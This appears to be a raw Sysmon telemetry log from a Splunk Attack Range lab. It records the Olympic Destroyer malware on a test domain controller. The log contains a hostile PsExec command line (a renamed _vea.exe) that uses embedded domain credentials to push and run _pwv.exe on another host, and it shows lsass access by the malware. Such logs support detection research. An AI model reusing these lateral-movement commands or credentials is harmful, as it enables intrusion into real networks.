11:14:24.497{C8EA50B7-12E6-6216-4B05-000000003802}67924840C:\Temp\olympic_destroyer.exe{C8EA50B7-1710-6216-1B07-000000003802}6188C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000297079Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:24.504{C8EA50B7-1710-6216-1B07-000000003802}6188C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\10.0.1.1 -u "VULT.LOCAL\r.vult" -p "LottaVirus2019" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000297078Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:24.497{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1710-6216-1B07-000000003802}6188C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000297077Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:24.497{C8EA50B7-16F9-6216-1307-000000003802}2052C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 23542300x8000000000000000297096Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:25.881{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86069B55E5934E317104608C557EED6A,SHA256=167122BC4A9899C564EE09B1E04D3F37C7790CE6383BF611A2CB97A5F87083AD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000220961Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:23.544{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51619-false10.0.1.12-8000- 23542300x8000000000000000297107Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:26.896{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C323C844F73C2029C14D79E6E1520190,SHA256=AA5BE69B787BDEE7E858076FC37512C1BDCE05301EC6D822DB53EED0311607AE,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000297106Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:14:26.734{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000297105Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:14:26.734{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x00946021) 13241300x8000000000000000297104Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:14:26.734{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d8289e-0x22f550d9) 13241300x8000000000000000297103Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:14:26.734{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d828a6-0x84b9b8d9) 13241300x8000000000000000297102Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:14:26.734{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d828ae-0xe67e20d9) 13241300x8000000000000000297101Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:14:26.734{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000297100Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:14:26.734{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x00946021) 13241300x8000000000000000297099Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:14:26.734{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d8289e-0x22f550d9) 13241300x8000000000000000297098Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:14:26.734{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d828a6-0x84b9b8d9) 13241300x8000000000000000297097Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:14:26.734{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d828ae-0xe67e20d9) 23542300x8000000000000000220962Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:25.999{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8C4013F3633220ACF6A2ADA6EFDACD8,SHA256=2399A993B35D61872D64A3FEB37C49BC84AAFA7DF30092EA8C9ED8CB28743DE8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297108Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:27.915{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4AC2518EE85DAFCA678E5DB90CB2C43B,SHA256=4352356E4BE34679139D5794E017BC729A1A7A6C0CCA6F14E4A6ABF10B04F7B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220963Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:27.031{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=939FFAD0FFB411FEBD85CF90B1C9A888,SHA256=3BAC2D182D35C596D0F55A2265BA896B40DD30D07477E08461EFE3AB9E1252C2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297109Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:28.933{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3FE448CC07848E8856FBE41056EE9091,SHA256=099F696B6925B2A968C15E093986F130C88275F75DBF8196D47F581429CCFE41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220964Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:28.234{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=73018FC7C40B3153399F7242AE56ACB9,SHA256=0A64D68C44797B7FA64782C989D8A04D70BF6CBE851A6E16C3BBF09EA6AD8579,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297110Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:29.948{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9C0E4B44E29CBC32F5C596BD73EF4E0,SHA256=F124D94F956C7975D17C643C98CEB00C1EDD0C2E0AF9517A1F284079A1CC520C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220965Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:29.374{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4676A285D6761D08A38B72279E6B8FEE,SHA256=F35AA137C1C9349E0533863D98380BA0D6D25C618DC1CB1CB9F1E43151D130A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297112Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:30.979{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE46A7419384FCB010EB995913822A18,SHA256=ED0A9489C9A6AC66B6743F7316737B089E92D516A1866FE6E40FB95E07B20F96,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220967Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:30.437{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=C51C1FE6F50525253FEFCB9181EF37AA,SHA256=4C2D7F2F74CD6B0A9B2CA99606DA8190977029F051498EE893FDCCA4B1CDAC8A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220966Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:30.390{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC9214E2925DF581E492CF06A0DCF2CC,SHA256=8765EEFFB6E22B8FC91F48EE1CBE649B03AC83AAAC42706ACAE99A1171E68C1F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297111Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:28.584{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49417-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000297113Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:31.994{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14B14FF8FC9D3ED0E88335F9714EFAF0,SHA256=E50467F50743FD1B08924CF890D7CCE07E8AE0ED367DED2EFAC12F68FF0DC645,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220969Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:31.405{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49DE94BFCDDB4BFE9D366B442E92E980,SHA256=F3F64C0A75AAADF0B53C80221CA76E2D8525E9E4F875CE2DE301E26D59D847F1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000220968Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:28.559{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51620-false10.0.1.12-8000- 10341000x8000000000000000220973Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:32.734{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11C-6215-1300-000000003902}832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220972Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:32.734{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11C-6215-1300-000000003902}832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220971Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:32.734{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11C-6215-1300-000000003902}832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000220970Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:32.421{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92DEAE5E609E90BE309132C7DCD44B3C,SHA256=13C7BF53F32C3A1050E61F20174AE3F0BA4B3316441DF628F0C0CD537C8B020F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000297129Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:32.616{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-1718-6216-1D07-000000003802}6336C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297128Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:32.616{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-1718-6216-1D07-000000003802}6336C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000297127Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 11:14:32.594{C8EA50B7-1718-6216-1D07-000000003802}6336C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000297126Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:32.447{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-1718-6216-1E07-000000003802}7000C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297125Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:32.447{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1718-6216-1E07-000000003802}7000C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297124Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:32.394{C8EA50B7-1718-6216-1E07-000000003802}70004804C:\Windows\system32\conhost.exe{C8EA50B7-1718-6216-1D07-000000003802}6336C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297123Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:32.316{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-1718-6216-1E07-000000003802}7000C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000297122Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:32.294{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1718-6216-1E07-000000003802}7000C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297121Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:32.147{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-1718-6216-1D07-000000003802}6336C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000297120Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:32.132{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297119Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 